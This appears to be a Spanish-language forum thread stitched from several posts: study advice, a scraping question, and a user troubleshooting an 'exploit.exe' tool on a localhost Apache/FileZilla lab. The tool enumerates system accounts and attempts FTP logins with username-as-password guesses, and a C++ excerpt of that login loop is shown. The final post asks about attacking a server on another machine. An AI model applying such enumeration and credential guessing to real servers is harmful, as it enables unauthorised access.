Mensajes

Yo estoy estudiando Ingeniería Informática y no me parece tan tan complicado (al menos el primer año  )

Tenemos 5 asignaturas, y sólo 2 de ellas (Física y Análisis Matemático) son parecidas a las de Bachiller.

De todas formas, si no vas bien en Física y Matemáticas, siempre puedes apuntarte a alguna academia, que haberlas haylas y muchas.

Y no desistas antes de entrar. Prueba y luego ya decidirás.

Hola, mi duda es si se puede hacer un programa en Java que te loguee en una web en la que estás registrado sin que haga falta escribir la URL en el navegador y conseguir información de su base de datos.

Por ejemplo y en mi caso:

Hacerlo con una página de fútbol en el que eres el manager y poder obtener el dinero que tienes, tus jugadores, etc.

Probé haciéndolo con el código fuente de la página de cada jugador, pero es muy costoso y me gustaría probar antes esta alternativa.

Un saludo.

Ok Iván, ahora mismo estoy teniendo algunos problemas con la conexión a Internet. 
Ya lo pruebo mañana y te cuento.

No, a ver, lo que he puesto es lo que me sale en el Filezilla Server cuando intenta loguearse con los distintos usuarios del archivo users.txt.
Por http va bien, pero no por FTP, que es cuando me aparece lo de "refused".

No hay manera de conectarse por FTP. Me dice continuamente "refused".
Sin embargo por http va perfectamente.

En el server me dice ésto:

(000015)12/10/2011 23:39:06 - (not logged in) (::1)> Connected, sending welcome message...
(000015)12/10/2011 23:39:06 - (not logged in) (::1)> 220 Bienvenido al Servidor FTP de SySc0d3r
(000015)12/10/2011 23:39:06 - (not logged in) (::1)> GET /~SySc0d3r HTTP/1.1
(000015)12/10/2011 23:39:06 - (not logged in) (::1)> 500 Syntax error, command unrecognized.
(000015)12/10/2011 23:39:06 - (not logged in) (::1)> Host: localhost
(000015)12/10/2011 23:39:06 - (not logged in) (::1)> 500 Syntax error, command unrecognized.
(000015)12/10/2011 23:39:06 - (not logged in) (::1)> Accept-Encoding: identity
(000015)12/10/2011 23:39:06 - (not logged in) (::1)> 500 Syntax error, command unrecognized.

Probaré a reinstalar y volver a configurarlo todo porque me da que ni el Apache ni el Filezilla funcionan correctamente...

Gracias por tu tiempo Iván.

Bueno en Linux me da problemas:

/usr/bin/python: can't find '__main__' module in 'LogOn.py'

No he podido solucionarlo, así que vuelvo a Windows

Estaba en linux, pero como el bruteforce es para Windows pues me cambié.
Ahora vuelvo.
De todas formas dime qué hago, ¿ejecuto el archivo y ya está? ¿Qué hago con el bruteforce?

¡Muchísimas gracias por haberte molestado en hacer el código! 

Ahora en seguida lo pruebo.
¿Pero dónde debo pegarlo exactamente? 

Gracias de nuevo.

Bien, por fin conseguí hacer que se me iniciara el Apache.
Simplemente tuve que terminar los procesos que utilizaban el puerto 80.

Utilizo este comando:
exploit.exe -f -h localhost -u users.txt

En vez de localhost, también puedo usar mi IP local.

Me muestra los usuarios del archivo perfectamente.
El problema viene después.  

Me sale que se ha conectado bien por FTP, pero justo después me dice que exploit.exe deja de funcionar.

• verifying list: OK (3 users)
  
• verifying host: OK
  
• connecting: OK
  
• verifying Apache: OK
  
• vulnerable: OK
  
  
• searching for system accounts, please wait...
  
• processing user #4
  
• scan result for localhost:
       
       found username: Admin
       found username: SySc0d3r
       found username: User
  
  
• trying log on via FTP...
  
• connecting: OK
  
  Y ahí me sale que dejó de funcionar  
  No sé cuál puede ser el problema, parece que el FTP no es.
  De todas formas también probaré con el POP3 (aunque no tengo ni idea de cómo se usa).
  
  
  Código (cpp) [Seleccionar] Expandir
  if(optftp == 1) {
    stop = 0;
    printf(" [+] trying log on via FTP...\n");
    printf(" [+] connecting:\t");


    if(mkconn(host, FTP_PORT) == TCPIP_ERROR) {
      printf("Closed\n");
      stop = 1;
    }

    if(!stop) {
      printf("OK\n");
      closesocket(sockfd);
      for(i=0; i < cant; i++) {
        if(trylogonFTP(host, fuser[i], fuser[i]) == 0) {
          printf("     logged in: %s\n", fuser[i]);
          flogged++;
        }
      }
      if(flogged == 0) printf("     no users logged in\n");
    }
  }
  
  Un saludo Ivan

Vale, ya entiendo.

Estoy probando ahora sin poner ni -f ni -p y he podido conectarme 

Aunque parece que el Apache me sigue sin funcionar, puesto que se me ha parado en:

• verifying Apache:
  
  Intentaré resolver ésto primero de todo.
  
  Sólo una cosa, ¿puedo usar el exploit desde este ordenador, por ejemplo, e intentar atacar un server alojado en otro ordenador que contiene el archivo con los usuarios? ¿O este archivo tiene que estar obligatoriamente en el misma carpeta que exploit.exe?